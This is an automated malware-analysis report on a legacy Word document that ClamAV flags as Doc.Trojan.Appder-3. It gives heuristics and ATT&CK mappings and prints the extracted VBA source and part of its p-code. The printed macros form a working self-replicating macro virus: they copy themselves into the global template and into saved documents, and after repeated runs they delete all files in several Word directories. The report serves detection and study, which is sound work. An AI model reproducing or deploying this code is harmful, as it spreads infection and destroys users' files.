MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing both AutoOpen and AutoClose VBA macros, indicating an attempt to execute code upon document interaction. The macro code attempts to modify the WINWORD6.INI file and potentially delete files, suggesting a downloader or dropper functionality. The presence of legacy WordBasic functions and the 'Virus Infected Bait File' text further support a malicious intent.
Heuristics 5
-
ClamAV: Doc.Trojan.Appder-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Appder-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9345 bytes |
SHA-256: 987a51ce200123ad65fe48866712bcedfc2e0ae2f944c2b6ac072cbb422abca5 |
|||
|
Detection
ClamAV:
Doc.Trojan.Appder-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SVGA"
Private Sub SD()
Dim DigitC$
Dim digit
DigitC$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", " VERMIN", "WINWORD6.INI ")
digit = WordBasic.Val(DigitC$) + 1
WordBasic.SetPrivateProfileString "Microsoft Word", "VERMIN", Str(digit), "WINWORD6.INI"
DigitC$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", "VERMIN", "WINWORD6.INI")
If DigitC$ = "3" Then
WordBasic.SetPrivateProfileString "Microsoft Word", "VERMIN", "1", "WINWORD6.INI"
DigitC$ = WordBasic.[DefaultDir$](10) + "\*.*"
WordBasic.Kill DigitC$
DigitC$ = WordBasic.[DefaultDir$](11) + "\*.*"
WordBasic.Kill DigitC$
DigitC$ = WordBasic.[DefaultDir$](12) + "\*.*"
WordBasic.Kill DigitC$
DigitC$ = WordBasic.[DefaultDir$](15) + "\*.*"
WordBasic.Kill DigitC$
End If
End Sub 'SD
Public Sub MAIN()
Dim MCS
Dim op
Dim ACLS
Dim Automatical
Dim sMacro$
Dim DigitC$
Dim yesno
On Error GoTo -1: On Error GoTo No
MCS = WordBasic.CountMacros(0, 0)
For op = 1 To MCS
If WordBasic.[MacroName$](op, 0, 0) = "AutoClose" Then
ACLS = -1
End If
If WordBasic.[MacroName$](op, 0, 0) = "SVGA" Then
Automatical = -1
End If
Next op
If Not ACLS And Not Automatical Then
sMacro$ = WordBasic.[FileName$]() + ":SVGA"
WordBasic.MacroCopy sMacro$, "Global:SVGA"
sMacro$ = WordBasic.[FileName$]() + ":AutoClose"
WordBasic.MacroCopy sMacro$, "Global:AutoClose"
End If
DigitC$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", " VERMIN", "WINWORD6.INI")
yesno = WordBasic.Val(DigitC$)
If Not yesno Then
SD
End If
No:
End Sub
Attribute VB_Name = "AutoClose"
Public Sub MAIN()
Dim ParaMacro$
Dim WOpen$
Dim yesno
Dim Dialogues As Object: Set Dialogues = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo No
WordBasic.CurValues.FileSaveAs Dialogues
If Dialogues.Format = 0 Then Dialogues.Format = 1
ParaMacro$ = WordBasic.[FileName$]() + ":AutoOpen"
WordBasic.MacroCopy "Global:SVGA", ParaMacro$
ParaMacro$ = WordBasic.[FileName$]() + ":SVGA"
WordBasic.MacroCopy "Global:SVGA", ParaMacro$
ParaMacro$ = WordBasic.[FileName$]() + ":AutoClose"
WordBasic.MacroCopy "Global:AutoClose", ParaMacro$
WordBasic.FileSaveAs Dialogues
GoTo Yes
No:
If Err.Number <> 102 Then
WOpen$ = WordBasic.[GetPrivateProfileString$]("Microsoft Word", " VERMIN", "WINWORD6.INI")
yesno = WordBasic.Val(WOpen$)
If Not yesno Then
WordBasic.FileSaveAs Dialogues
End If
End If
Yes:
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /opt/analyzer/scan_staging/60fc8450bdff4597ade9a532373de97d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/AutoClose - 2798 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' Dim
' VarDefn ParaMacro
' Line #3:
' Dim
' VarDefn WOpen
' Line #4:
' Dim
' VarDefn yesno
' Line #5:
' Dim
' VarDefn Dialogues (As Object)
' BoS 0x0000
' SetStmt
' LitVarSpecial (False)
' Ld WordBasic
' MemLd DialogRecord
' ArgsMemLd FileSaveAs 0x0001
' Set Dialogues
' Line #6:
' OnError <crash>
' BoS 0x0000
' OnError No
' Line #7:
' Ld Dialogues
' Ld WordBasic
' MemLd CurValues
' ArgsMemCall FileSaveAs 0x0001
' Line #8:
' Line #9:
' Ld Dialogues
' MemLd Format$
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' LitDI2 0x0001
' Ld Dialogues
' MemSt Format$
' EndIf
' Line #10:
' Line #11:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' LitStr 0x0009 ":AutoOpen"
' Add
' St ParaMacro$
' Line #12:
' LitStr 0x000B "Global:SVGA"
' Ld ParaMacro$
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #13:
' Ld WordBa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.